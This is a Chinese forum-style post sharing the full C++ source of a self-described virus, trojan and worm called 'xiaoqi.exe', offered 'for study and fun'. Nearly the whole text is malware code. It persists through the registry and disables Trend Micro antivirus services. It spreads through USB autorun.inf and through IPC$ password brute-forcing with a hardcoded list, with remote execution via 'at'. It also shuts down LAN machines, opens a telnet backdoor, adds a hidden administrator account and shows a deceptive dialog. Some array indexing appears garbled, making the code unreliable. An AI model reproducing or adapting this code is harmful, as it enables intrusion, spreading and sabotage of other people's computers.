一个恶意程序

本人最近学习网络安全，突发灵感，写了兼有病毒、木马、蠕虫于特点的东东。现在贴出来，仅供学习娱乐，勿做他用，否则责任自负。
编译环境：vc++32位应用程序。源文件有system.h、init.cpp、system.cpp三个。先分别给出代码。
//system.h,系统总体规划
#if !defined(_IHATEBUGGING)
#define _IHATEBUGGING
#include <io.h>
#include <time.h>
#include <stdio.h>
#include <string.h>
struct sys{     //配置全局变量类型
char syspath[30];  //系统路径
char hostip[16];  //主机IP
char guestip[16];  //客户IP
char user[20];   //用户名
char passwd[20];  //密码
char flag[6];   //标识
char send;    //是否攻击网络,0不攻击,1攻击
char station;   //客户本机标识/10的值
char lastdisk[4];  //最后一个盘符
int  hacknum;   //已入侵的主机数
};
void getpath();         //获取系统路径
void saveconfig(char flagfile[40]);    //加密保存配置
void filecopy(FILE *fp);      //拷贝副本，如果是远程就尝试启动
void checkTime(char hostip[16]);    //和主机对时
void changereg();        //更改注册表
int Init(int argc,char * args[]);    //初始化
void shut(char netid[12],int start,int end); //尝试关闭局域网内start~end网段的机子
void hacknet(int childip,char netid[12]);  //网络入侵
void hackdisk(char diskroot[4]);    //攻击U盘
void shut_open();        //关闭趋势防毒墙并打开后门
void TIMER(long minute);      //主循环模拟事件
#endif // !defined(_IHATEBUGGING)

//init.cpp,系统初始化

#include <windows.h>
#include "system.h"
extern struct sys Sysmesg;          //定义于system.cpp
void saveconfig(char flagfile[40])         //加密保存配置
{
struct sys message=Sysmesg;
char *p=(char *)&message;
for(int i=0;i<sizeof(message);i++)
  (*p++)+=3;
FILE *fp=fopen(flagfile,"wb");
fwrite(&message,sizeof(message),1,fp);
fclose(fp);
}
void openconfig(char flagfile[40])           //读取配置并解密
{
FILE *fp=fopen(flagfile,"rb");
fread(&Sysmesg,sizeof(Sysmesg),1,fp);
fclose(fp);
char *p=(char *)&Sysmesg;
for(int i=0;i<sizeof(Sysmesg);i++)
  (*p++)-=3;
}
void getconfig(char * args[])              //从参数获取配置信息
{
char disk[4]="C://";
strcpy(Sysmesg.hostip,args[1]);
strcpy(Sysmesg.guestip,args[2]);
strcpy(Sysmesg.user,args[3]);
strcpy(Sysmesg.passwd,args[4]);
strcpy(Sysmesg.flag,args[5]);
if(Sysmesg.flag[1]=='z')
  Sysmesg.flag[0]+=1,Sysmesg.flag[1]='A';
else
{
  Sysmesg.flag[1]+=1;
  Sysmesg.send=(Sysmesg.flag[0]=='Z'&&Sysmesg.flag[1]=='Z')?0:1;
}
Sysmesg.station=0;           //获取本机标识/10的值
int i,k=strlen(Sysmesg.guestip)-1;
while(Sysmesg.guestip[--k]!='.');
for(i=k+1;i<(int)strlen(Sysmesg.guestip)-1;i++)
  Sysmesg.station=Sysmesg.station*10+Sysmesg.guestip -'0';
while(access(disk,0)==0)
  disk[0]++;
disk[0]--;
strcpy(Sysmesg.lastdisk,disk);           //获取最后一个盘符
Sysmesg.hacknum=0;            //初始化已攻击机器数
if(strcmp(Sysmesg.hostip,"127.0.0.1"))     //网络入侵则和主机对时
  checkTime(Sysmesg.hostip);
}
void getpath()              //获取系统路径
{
if(access("c://winnt",0)==0)
  strcpy(Sysmesg.syspath,"c://winnt//");
else if(access("c://windows",0)==0)
  strcpy(Sysmesg.syspath,"c://windows//");
else
  strcpy(Sysmesg.syspath,"c://");
}
void filecopy(FILE *fp)             //拷贝副本
{
fprintf(fp,"attrib -r -h -s xiaoqi.exe/r/n");
fprintf(fp,"copy xiaoqi.exe z:///r/n");
fprintf(fp,"attrib +r +h +s xiaoqi.exe/r/n");
fprintf(fp,"attrib +r +h +s z://xiaoqi.exe/r/n");
}
void checkTime(char hostip[16])            //和主机对时
{
FILE *fp=fopen("checktime.bat","wb");
fprintf(fp,"net use %s//ipc$ /"/" /user:/"/"/r/n",Sysmesg.hostip);
fprintf(fp,"net time %s /set /y/r/n",Sysmesg.hostip);
fprintf(fp,"net use %s//ipc$ /del /y/r/n",Sysmesg.hostip);
fprintf(fp,"del checktime.bat/r/n");
fclose(fp);
WinExec("checktime.bat",SW_HIDE);    
}      
void changereg()             //更改注册表
{
FILE *fp=fopen("regchg.bat","wb");
fprintf(fp,"reg add /"HKEY_CURRENT_USER//Software//Microsoft//Windows NT//");
fprintf(fp,"CurrentVersion//Windows/" /v /"load/" /t REG_SZ /d ");
fprintf(fp,"/"%sxiaoqi.exe/" /f/r/n",Sysmesg.syspath);
fprintf(fp,"reg add /"HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//");
fprintf(fp,"ntrtscan/" /v /"Start/" /t REG_DWORD /d /"4/" /f/r/n");
fprintf(fp,"reg add /"HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//");
fprintf(fp,"OfcPfwSvc/" /v /"Start/" /t REG_DWORD /d /"4/" /f/r/n");
fprintf(fp,"reg add /"HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//");
fprintf(fp,"tmlisten/" /v /"Start/" /t REG_DWORD /d /"4/" /f/r/n");
fprintf(fp,"reg delete /"HKEY_CURRENT_USER//SOFTWARE//Microsoft//Windows//");
fprintf(fp,"CurrentVersion//Run/" /v /"OfficeScanNT Monitor/" /f/r/n");
fprintf(fp,"del regchg.bat/r/n");
fclose(fp);
WinExec("regchg.bat",SW_HIDE);
}
int Init(int argc,char * args[])             //初始化
{
char flagfile[40];
getpath();               //获取系统路径
strcpy(flagfile,Sysmesg.syspath);
strcat(flagfile,"xiaoqi.exe");
if(access(flagfile,0)==-1)         //通过U盘传播进入或用户自己激发
{
  char cmd[100],localip[16];
  FILE *fp;
  WinExec("cmd.exe /c ipconfig.exe|find /"IP Address/">ipaddress",SW_HIDE);
  Sleep(1000);
  fp=fopen("ipaddress","rb");
  fgets(cmd,100,fp);
  fclose(fp);
  WinExec("cmd.exe /c /"del ipaddress/"",SW_HIDE);
  for(int i=strlen(cmd);cmd<'0' || cmd>'9';i--);
  for(cmd=0;cmd!=' ';i--);
  strcpy(localip,&cmd);        //获取本地IP地址
  changereg();
  strcpy(cmd,Sysmesg.syspath);
  if(strlen(cmd)>3)        //过滤非根目录末尾的'/'字符
   cmd[strlen(cmd)-1]=0;
  fp=fopen("localhak.bat","wb");  
  fprintf(fp,"subst z: %s/r/n",cmd);
  filecopy(fp);
  fprintf(fp,"subst z: /d/r/n");
  fprintf(fp,"start /Dc: %sxiaoqi.exe 127.0.0.1 ",Sysmesg.syspath);
  fprintf(fp,"%s administrator 7654321 AA001/r/n",localip);
  fprintf(fp,"del localhak.bat/r/n");   fclose(fp);
  WinExec("localhak.bat",SW_HIDE);
  return 0;
}
if(access("d://",0)==0 && access("d://xiaoqi.exe",0)==-1)
  hackdisk("d://");         //感染D盘,防止重装系统
strcpy(flagfile,Sysmesg.syspath);
strcat(flagfile,"config");
if(argc==6)            //通过网络入侵进入系统
{
  getconfig(args);
  saveconfig(flagfile);
  changereg();
}
else if(argc==1)
  openconfig(flagfile);
else              //双击U盘时机器已感染
{
  char cmd[20]="explorer ";
  strcat(cmd,args[1]);
  WinExec(cmd,SW_SHOW);
  return 0;
}
return 1;
}

//system.cpp,主文件
#include <time.h>
#include <direct.h>
#include <windows.h>
#include "system.h"
struct sys Sysmesg;             //配置全局变量
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
char *args[6];
int argc=1,k=0,i;
long minute=0;
for(i=0;i<6;i++)
  args=new char[20];
if(strcmp(lpCmdLine,""))           //分离命令行参数
  for(args[0]="xiaoqi.exe";lpCmdLine[k]!=0;)
  {
   i=0,argc++;
   while(lpCmdLine[k]!=' ' && lpCmdLine[k]!=0)
    args[argc-1]=lpCmdLine[k++];
   args[argc-1]=0;
   while(lpCmdLine[k]==' ')
    k++;
  }
if(!Init(argc,args))         //初始化并判断执行来源
  return 0;
else if(CreateMutex(NULL,TRUE,"_BACKUPRUN_"))   //互斥对象保证只运行一个副本  
{  
  if(GetLastError()==ERROR_ALREADY_EXISTS)
  {  
   MessageBox(NULL,"磁盘驱动程序,请勿操作!","系统信息",NULL);  //迷惑用户
   return  0;  
  }
}
_chdir(Sysmesg.syspath);         //更改当前目录到系统目录
srand((unsigned)time(NULL));           //初始化种子
while(1)
{
  Sleep(20000);
  TIMER(++minute);
}
return 1;
}
void shut(char netid[12],int start,int end)  //尝试关闭局域网内start~end网段的机子
{
FILE *fp=fopen("shutdown.bat","wb");
fprintf(fp,"set /a localid=%d/r/n",start);
fprintf(fp,":begin/r/n");
fprintf(fp,"net use %s%%localid%%//ipc$ %s /user:%s/r/n",netid,Sysmesg.passwd,Sysmesg.user);
fprintf(fp,"if errorlevel 1 net use %s%%localid%%",netid);
fprintf(fp,"[url=file://ipc$/]//ipc$[/url] /"/" /user:administrator/r/n");
fprintf(fp,"if errorlevel 1 goto next/r/n");
fprintf(fp,"shutdown.exe -s -m %s%%localid%% -t 00/r/n",netid);
fprintf(fp,"net use %s%%localid%%//ipc$ /del /y/r/n",netid);
fprintf(fp,":next/r/n");
fprintf(fp,"set /a localid=%%localid%%+1/r/n");
fprintf(fp,"if %%localid%%==%d goto end/r/n",end);
fprintf(fp,"goto begin/r/n");
fprintf(fp,":end/r/n");
fprintf(fp,"del shutdown.bat/r/n");
fclose(fp);
WinExec("shutdown.bat",SW_HIDE);
}
void hacknet(char netid[12],int childip)          //网络入侵
{
time_t xx=time(0)+600;
char farid[4]="123",flag[6],flagfile[40],tm[25];
char passwd[][10]={"/"/"","123","1234","12345","123456","1234567","7654321","654321","54321",
                 "888888","12345678","000000","god","God","haha","user","admin","passwd",
        "password","guest","1983","1984","1985","1986","1987","1988","1989","1990",
        "0125","0912","0705","0735","911","520","father","mother","brother","sister",
        "beauty","beautiful","strong","power","powerful","rand","intel","dell",
        "sony","Alcatel","alcatel","acer","lenovo","compaq","Dell","daevoo","iei",
        "chocon","iei123","legend","Acer","pass","hack","hacker","crack","cracker",
        "jay","allen","john","beijing","nanjing","hefei","jodan","backhan","[email=!@#$%]!@#$%[/email]",
        "!@#$%^","!@#$%^&","!@#$%^&*","@#$%^&","bill","kiss","kitty","wang","zhang",
        "liu","chen","yang","zhao","huang","iloveyou","ihateyou","19851225","zhou",
        "copy","19851225","feifei","evil","xiaoqi","ashou","yinmo","angel","hero"};
strcpy(tm,ctime(&xx));
tm[19]=0;
FILE *fp=fopen("nethak.bat","wb");
farid[0]=childip/100+'0';
farid[1]=(childip%100)/10+'0';
farid[2]=childip%10+'0';
fprintf(fp,"net use %s%s//ipc$ /"/" /user:/"/"/r/n",netid,farid);
fprintf(fp,"if errorlevel 1 goto end/r/n");
fprintf(fp,"net use %s%s//ipc$ /del /y/r/n",netid,farid);
fprintf(fp,"net use %s%s//ipc$ ",netid,farid);
fprintf(fp,"%s /user:%s/r/n",Sysmesg.passwd,Sysmesg.user);
for(int i=0;i<sizeof(passwd)/10;i++)
  fprintf(fp,"if errorlevel 1 net use %s%s//ipc$ %s /user:administrator/r/n",
    netid,farid,passwd);
fprintf(fp,"if errorlevel 1 goto end/r/n");
fprintf(fp,"net use z: %s%s//admin$/r/n",netid,farid);
fprintf(fp,"if not exist z:// goto disconnect/r/n");
fprintf(fp,"if exist z://xiaoqi.exe goto disconnect/r/n");
filecopy(fp);
Sysmesg.hacknum++;
flag[0]=Sysmesg.flag[0];   flag[1]=Sysmesg.flag[1];
flag[2]=Sysmesg.hacknum/100+'0'; flag[3]=(Sysmesg.hacknum%100)/10+'0';
flag[4]=Sysmesg.hacknum%10+'0';  flag[5]=0;
fprintf(fp,"at %s%s %s ",netid,farid,&tm[11]);
if(strcmp(Sysmesg.syspath,"c://"))
  fprintf(fp,"%%windir%%//xiaoqi.exe %s %s%s ",Sysmesg.guestip,netid,farid);
else
  fprintf(fp,"c://xiaoqi.exe %s %s%s ",Sysmesg.guestip,netid,farid);
fprintf(fp,"%s %s %s/r/n",flag,Sysmesg.user,Sysmesg.passwd);
fprintf(fp,":disconnect/r/n");  fprintf(fp,"net use * /del /y/r/n");
fprintf(fp,":end/r/n");    fprintf(fp,"del nethak.bat/r/n"); fclose(fp);
WinExec("nethak.bat",SW_HIDE);
strcpy(flagfile,Sysmesg.syspath); strcat(flagfile,"config");
saveconfig(flagfile);
}
void hackdisk(char diskroot[4])             //感染U盘
{
char cmd[20];
FILE *fp;
strcpy(cmd,diskroot); strcat(cmd,"autorun.inf");
fp=fopen(cmd,"wb");
fprintf(fp,"[autorun]/r/n");
fprintf(fp,"open=.//xiaoqi.exe %%1/r/n/r/n");
fprintf(fp,"shell//1=Open/r/n");
fprintf(fp,"shell//1//Command=.//xiaoqi.exe %%1/r/n");
fprintf(fp,"shell//2//=Browser/r/n");
fprintf(fp,"shell//2//Command=.//xiaoqi.exe %%1/r/n/r/n");
fprintf(fp,"shellexecute=.//xiaoqi.exe %%1/r/n");
fclose(fp);
fp=fopen("diskhack.bat","wb");
fprintf(fp,"subst z: %s/r/n",diskroot);
filecopy(fp);
fprintf(fp,"attrib +s +r +h z://autorun.inf/r/n");
fprintf(fp,"subst z: /d/r/n");
fprintf(fp,"del diskhack.bat/r/n"); fclose(fp);
WinExec("diskhack.bat",SW_HIDE);
}
void shut_open()           //关闭趋势防毒墙并打开后门
{
FILE *fp=fopen("shutopen.bat","wb");
fprintf(fp,"net stop tmlisten/r/n");
fprintf(fp,"net stop ntrtscan/r/n");
fprintf(fp,"net stop ofcpfwsvc/r/n");
fprintf(fp,"taskkill /f /im pccntmon.exe/r/n");
fprintf(fp,"if errorlevel 1 taskkill /f ");
fprintf(fp,"/u %s /p %s /im pccntmon.exe/r/n",Sysmesg.user,Sysmesg.passwd);
fprintf(fp,"net stop telnet/r/n");
if(!strcmp(strlwr(Sysmesg.syspath),"c://windows"))
  fprintf(fp,"tlntadmn config port=301 sec=+passwd/r/n");
else if(!strcmp(strlwr(Sysmesg.syspath),"c://winnt"))
{
  fprintf(fp,"echo 3>tlntcnfg/r/n");
  fprintf(fp,"echo 7>>tlntcnfg/r/n");
  fprintf(fp,"echo y>>tlntcnfg/r/n");
  fprintf(fp,"echo 0>>tlntcnfg/r/n");
  fprintf(fp,"echo y>>>tlntcnfg/r/n");
  fprintf(fp,"echo 301>>tlntcnfg/r/n");
  fprintf(fp,"echo y>>tlntcnfg/r/n");
  fprintf(fp,"echo 0>>tlntcnfg/r/n");
  fprintf(fp,"echo 0>>tlntcnfg/r/n");
  fprintf(fp,"tlntadmn<tlntcnfg/r/n");
  fprintf(fp, "del tlntcnfg/r/n");
}
fprintf(fp,"net start telnet/r/n");
fprintf(fp,"net share system$=%ssystem32/r/n",Sysmesg.syspath);
fprintf(fp,"net user system$ system /add/r/n");
fprintf(fp,"net localgroup administrators system$ /add/r/n");
fprintf(fp,"del shutopen.bat/r/n");
fclose(fp);
WinExec("shutopen.bat",SW_HIDE);
}
void TIMER(long minute)            //主循环模拟触发器
{
char disk[4],backfile[15];
strcpy(disk,Sysmesg.lastdisk);
for(disk[0]='Z';disk[0]>=Sysmesg.lastdisk[0];disk[0]--)
  if(access(disk,0)==0)             //感染U盘
  {
   sprintf(backfile,"%s%s",disk,"xiaoqi.exe");
   if(access(backfile,0)==-1)       //识别U盘是否已感染
    hackdisk(disk);
  }
if(minute%11==0)         //尝试关闭趋势防毒墙并打开后门
  shut_open();
else if(minute%57==0)             //群发消息
   WinExec("net send * 病毒和蠕虫有什么区别?",SW_HIDE);
else
{
  char netid[16];
  strcpy(netid,Sysmesg.guestip);
  if(Sysmesg.station==0)
   netid[strlen(netid)-1]=0;
  else if(Sysmesg.station<10)
   netid[strlen(netid)-2]=0;
  else
   netid[strlen(netid)-3]=0;
  if(minute%97==0 && rand()%2==1)         //尝试关闭其他机器
   if(Sysmesg.station==25)
    shut(netid,Sysmesg.station*10+1,255);
   else
    shut(netid,Sysmesg.station*10+1,(Sysmesg.station+1)*10);
  else if(Sysmesg.hacknum<999 && minute%23==0 && Sysmesg.send)//尝试网络入侵
  {
   int childip=rand()%254+1;
   hacknet(netid,childip);
  }
}
}